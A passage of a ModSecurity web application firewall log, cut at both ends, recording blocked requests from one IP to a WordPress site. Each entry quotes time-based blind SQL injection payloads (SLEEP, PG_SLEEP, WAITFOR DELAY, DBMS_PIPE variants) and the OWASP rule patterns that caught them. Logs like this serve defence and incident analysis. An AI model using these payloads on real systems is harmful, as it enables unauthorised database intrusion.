"125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 4.2.16' AND SLEEP(5) AND 'ZKEJ'='ZKEJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFkoxkekPtrPbqLNY4SAAAAMA"] [Wed Jun 26 16:18:10.806442 2024] [:error] [pid 31859:tid 140055276394240] [client 141.98.81.52:34242] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 4.2.16%' AND SLEEP(5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFkoxkekPtrPbqLNY4SQAAAM0"] [Wed Jun 26 16:18:11.055647 2024] [:error] [pid 31859:tid 140055268001536] [client 141.98.81.52:34244] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 4.2.16 AND SLEEP(5)-- ifcQ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFk4xkekPtrPbqLNY4SgAAAM4"] [Wed Jun 26 16:18:11.519466 2024] [:error] [pid 31245:tid 140055217645312] [client 141.98.81.52:34246] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 4.2.16) AND 1512=(SELECT 1512 FROM PG_SLEEP(5)) AND (4502=4502"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFk657xDCgKzJ-zxAxjAAAAFQ"] [Wed Jun 26 16:18:11.759256 2024] [:error] [pid 31859:tid 140055432812288] [client 141.98.81.52:34248] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 4.2.16 AND 1512=(SELECT 1512 FROM PG_SLEEP(5))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFk4xkekPtrPbqLNY4SwAAAMM"] [Wed Jun 26 16:18:11.995443 2024] [:error] [pid 31246:tid 140055268001536] [client 141.98.81.52:34250] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 4.2.16') AND 1512=(SELECT 1512 FROM PG_SLEEP(5)) AND ('SFOd'='SFOd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFk1xchXPGtOGw21Gp4gAAAI4"] [Wed Jun 26 16:18:12.235741 2024] [:error] [pid 31246:tid 140055276394240] [client 141.98.81.52:34252] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 4.2.16' AND 1512=(SELECT 1512 FROM PG_SLEEP(5)) AND 'MszL'='MszL"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFlFxchXPGtOGw21Gp4wAAAI0"] [Wed Jun 26 16:18:12.477556 2024] [:error] [pid 31859:tid 140055184074496] [client 141.98.81.52:34254] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 4.2.16%' AND 1512=(SELECT 1512 FROM PG_SLEEP(5)) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFlIxkekPtrPbqLNY4TAAAANg"] [Wed Jun 26 16:18:12.723915 2024] [:error] [pid 31244:tid 140055259608832] [client 141.98.81.52:34256] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 4.2.16 AND 1512=(SELECT 1512 FROM PG_SLEEP(5))-- LKcI"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFlObXXCyFmkhe1iNqRwAAAA8"] [Wed Jun 26 16:18:12.959115 2024] [:error] [pid 31246:tid 140055441204992] [client 141.98.81.52:34258] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 4.2.16) WAITFOR DELAY '0:0:5' AND (8612=8612"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFlFxchXPGtOGw21Gp5AAAAII"] [Wed Jun 26 16:18:13.205744 2024] [:error] [pid 31246:tid 140055226038016] [client 141.98.81.52:34260] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 4.2.16 WAITFOR DELAY '0:0:5'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFlVxchXPGtOGw21Gp5QAAAJM"] [Wed Jun 26 16:18:13.455911 2024] [:error] [pid 31246:tid 140055217645312] [client 141.98.81.52:34262] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 4.2.16') WAITFOR DELAY '0:0:5' AND ('gVHa'='gVHa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFlVxchXPGtOGw21Gp5gAAAJQ"] [Wed Jun 26 16:18:13.690599 2024] [:error] [pid 31246:tid 140055424419584] [client 141.98.81.52:34264] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 4.2.16' WAITFOR DELAY '0:0:5' AND 'QTZT'='QTZT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFlVxchXPGtOGw21Gp5wAAAIQ"] [Wed Jun 26 16:18:13.942767 2024] [:error] [pid 31246:tid 140055234430720] [client 141.98.81.52:34266] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 4.2.16%' WAITFOR DELAY '0:0:5' AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFlVxchXPGtOGw21Gp6AAAAJI"] [Wed Jun 26 16:18:14.183172 2024] [:error] [pid 31859:tid 140055251216128] [client 141.98.81.52:34268] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 4.2.16 WAITFOR DELAY '0:0:5'-- YsVs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFloxkekPtrPbqLNY4TQAAANA"] [Wed Jun 26 16:18:14.436323 2024] [:error] [pid 31244:tid 140055424419584] [client 141.98.81.52:34270] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16) AND 1591=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(105)||CHR(86)||CHR(83),5) AND (7530=7530"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFlubXXCyFmkhe1iNqSAAAAAQ"] [Wed Jun 26 16:18:14.684982 2024] [:error] [pid 31246:tid 140055184074496] [client 141.98.81.52:34272] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16 AND 1591=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(105)||CHR(86)||CHR(83),5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFllxchXPGtOGw21Gp6QAAAJg"] [Wed Jun 26 16:18:14.929219 2024] [:error] [pid 31859:tid 140055209252608] [client 141.98.81.52:34274] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16') AND 1591=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(105)||CHR(86)||CHR(83),5) AND ('SelQ'='SelQ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFloxkekPtrPbqLNY4TgAAANU"] [Wed Jun 26 16:18:15.174685 2024] [:error] [pid 31859:tid 140055301572352] [client 141.98.81.52:34276] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16' AND 1591=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(105)||CHR(86)||CHR(83),5) AND 'pHVw'='pHVw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFl4xkekPtrPbqLNY4TwAAAMo"] [Wed Jun 26 16:18:15.423535 2024] [:error] [pid 31859:tid 140055441204992] [client 141.98.81.52:34278] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16%' AND 1591=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(105)||CHR(86)||CHR(83),5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFl4xkekPtrPbqLNY4UAAAAMI"] [Wed Jun 26 16:18:15.675010 2024] [:error] [pid 31244:tid 140055326750464] [client 141.98.81.52:34280] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 4.2.16 AND 1591=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(105)||CHR(86)||CHR(83),5)-- KelC"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZnyFl-bXXCyFmkhe1iNqSQAAAAc"] [Wed Jun 26 16:18:15.939754 2024] [:error] [pid 31246:tid 140055407634176] [client 141.98.81.52:34282] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file 